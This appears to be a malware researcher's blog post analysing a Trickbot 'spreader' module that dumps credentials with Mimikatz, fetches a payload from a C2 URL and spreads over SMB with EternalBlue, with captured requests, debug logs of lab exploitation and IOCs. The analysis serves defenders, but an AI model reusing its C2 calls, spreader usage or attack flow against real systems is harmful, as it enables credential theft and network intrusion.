It's a been long time since my last post here. Too busy with
everything. However, now I had a change to write something quickly!
About two weeks ago, Trickbot dropped something interesting.
The file name was "spreader.bin". This wasn't from the latest email
campaign or anything, but from a monitored instance. The spreader file was
downloaded from one of the C2 servers of Trickbot.
I got my tools open and realized that the file is 64-bit
executable. For some reason it was dropped to a 32-bit environment of Trickbot.
 |
| Image 1. The first run. |
On background an unknown file was downloaded and then the spreader process was terminated:
GET http://kishi73.com.br/table.png
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: WinHTTP loader/1.0
Host: kishi73.com.br
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML
2.0//EN">
<html>
<head>
<title>404 Not
Found</title>
</head>
<body>
<h1>Not
Found</h1>
<p>The
requested URL /table.png was not found on this server.</p>
<hr>
<address>Apache Server at kishi73.com.br Port 80</address>
</body>
</html>
Unfortunately the file wasn't available anymore. As you can
see from the image 1, a module called "PwDumper.dll" was loaded.
Yes, it's Mimikatz and it was used to dump the credentials. The module is
created to the directory, where the spreader is executed, and deleted before
termination of the spreader process.
According to the amount of information the spreader is
printing, it must still be in development, I believe. There are also many
handles to be used with the executable:
--url
--user
--password
--domain
--console
--log
As an example, you could define the url where the file
(table.png) is downloaded. With "--console" handle, you got debug
strings printed to your console:
thread 2984 Using:
thread 2984
user="test"
thread 2984
user="testpassword"
thread 2984 load
http://kishi73.com.br/table.png
thread 2984 domain: kishi73.com.br , resource: table.png
thread 2984 Bad the loading file prefix: 3c21444f
thread 2984 loaded: <!DOCTYPE HTML PUBLIC
"-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /table.png was not found on this
server.</p>
<hr>
<address>Apache Server at kishi73.com.br Port
80</address>
</body></html>
thread 2984 domain: kishi73.com.br , resource: table.png
thread 2984 WinHttpSendRequest A security error occurred
(0x00002f8f)
I wasn't able to get my hands on the "table.png"
file anymore. Anyway, from a debugger we can see the spreader process is waiting for an executable
file:
 |
| Image 2. Debugged code. |
Thanks to the "--url" handle, it was very easy to define the file to download. "The file" is the actual payload, which will be pushed to the exploited machines. I used a non-malicious executable (PEiD) for testing. This time the spreader process
wasn't terminated and it started to scan the network range where my workstation
resides:
 |
| Image 3. Network scan. |
The spreader tried to establish an initial SMB connection with all available machines by using the dumped credentials. If the credentials were working, it did proceed to exploit vulnerability MS17-010 (EternalBlue).
I started two Windows 7 machines (x64 and x86) and created the same account as seen in the image 1. Both of the machines were unpatched. The exploiting process wasn't very stable, but in the end both of machines were exploited successfully including the machine where the spreader was run. Here is debug log from the tool when a remote Windows 7 x64 machine was exploited:
C:\Users\Nicholas\Desktop>spreader.exe --console
--url="http://x.x.x.x/PEiD.exe" | findstr 10.0.10.12\"
thread 308 checking address "10.0.10.12"
thread 308 Host "10.0.10.12", SMB_COM_TREE_CONNECT_ANDX:
service "IPC", native file system ""
thread 308 HOST 10.0.10.12, using named pipe: samr
thread 308 Host "10.0.10.12",
SMB_COM_TREE_CONNECT_ANDX: service "IPC", native file system
""
thread 308 Eternal romance object ("10.0.10.12")
9.
thread 308 Host "10.0.10.12",
SMB_COM_TREE_CONNECT_ANDX: service "A:", native file system
"NTFS"
thread 308 the file
C:\WINDOWS\44783m8uh77g8l8_nkubyhu5vfxxbh878xo6hlttkppzf28tsdu5kwppk_11c1jl.exe
on host 10.0.10.12 is created
thread 308 Host "10.0.10.12", SMB_COM_TREE_CONNECT_ANDX:
service "A:", native file system "NTFS"
thread 308 the file C:\WINDOWS\lgwgf4lrucfcaa_vo6bqb08eo1nja1f4d_h2dnradrkw11hvguuphvk__7sg7rwb.exe
on host 10.0.10.12 is created
thread 308 Host "10.0.10.12",
SMB_COM_TREE_CONNECT_ANDX: service "IPC", native file system
""
thread 308
Service(10.0.10.12:lgwgf4lrucfcaa_vo6bqb08eo1nja1f4d_h2dnradrkw11hvguuphvk__7sg7rwb
started.
thread 308 Host "10.0.10.12",
SMB_COM_TREE_CONNECT_ANDX: service "IPC", native file system
""
Generated file names were always 64 characters and the following characters were used: "0123456789_qwertyuiopasdfghjklzxcvbnm" to generate file names.
Trickbot already has some worm capabilities, but nothing
like this, as far as I know. Immediately dumping credentials from the patient
zero and then using the credentials to exploit local area network with Eternalblue exploit
may lead to multiple infected machines very quickly. Right now the payload can
be easily chosen, so the spreader could be used to spread any payload.
IOCs:
Network:
hxxp://kishi73[.]com.br/table.png
194.87.98[.]146/spreader.bin
194.87.98[.]146/spreader.bin
Files:
spreader.bin
b1cccf65c89d2df401b9ed2ebefec815eb9cf330e459a5dbffd629089444642f
(analyzed)
dd69cc0dd8d82a1686222c54ee24b17ed813e8f9b7b42edaa5efdf50c7792ddf
PwDumper.dll
5eb9f59fb32c3eb9f7ddcd470f87caa2a1e0a17d19453ccc857e980f6fff233a
Debug strings:
d:\myprojects\spreader\x64\release\spreader.pdb
